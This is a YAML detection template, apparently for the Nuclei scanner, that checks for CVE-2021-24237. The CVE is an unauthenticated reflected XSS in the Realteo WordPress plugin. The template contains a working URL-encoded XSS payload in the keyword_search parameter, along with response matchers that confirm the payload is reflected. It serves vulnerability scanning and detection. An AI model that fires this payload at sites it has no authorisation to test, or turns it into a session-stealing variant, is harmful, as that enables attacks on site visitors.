40 lines
1.1 KiB
YAML
40 lines
1.1 KiB
YAML
id: CVE-2021-24237
|
|
|
|
info:
|
|
author: 0x_Akoko
|
|
name: Realteo WordPress Plugin <= 1.2.3 - Unauthenticated Reflected XSS
|
|
description: The plugin, used by the Findeo Theme, did not properly sanitise the keyword_search, search_radius.
|
|
severity: medium
|
|
tags: cve,cve2021,realteo,xss,wordpress,plugin
|
|
reference:
|
|
- https://wpscan.com/vulnerability/087b27c4-289e-410f-af74-828a608a4e1e
|
|
- https://m0ze.ru/vulnerability/[2021-03-20]-[WordPress]-[CWE-79]-Realteo-WordPress-Plugin-v1.2.3.txt
|
|
classification:
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
|
cvss-score: 6.10
|
|
cve-id: CVE-2021-24237
|
|
cwe-id: CWE-79
|
|
|
|
requests:
|
|
- method: GET
|
|
path:
|
|
- '{{BaseURL}}/properties/?keyword_search=--!%3E%22%20autofocus%20onfocus%3Dalert(/{{randstr}}/)%3B%2F%2F'
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: status
|
|
status:
|
|
- 200
|
|
|
|
- type: word
|
|
words:
|
|
- "autofocus onfocus=alert(/{{randstr}}/);//"
|
|
- "Nothing found"
|
|
part: body
|
|
condition: and
|
|
|
|
- type: word
|
|
words:
|
|
- "text/html"
|
|
part: header
|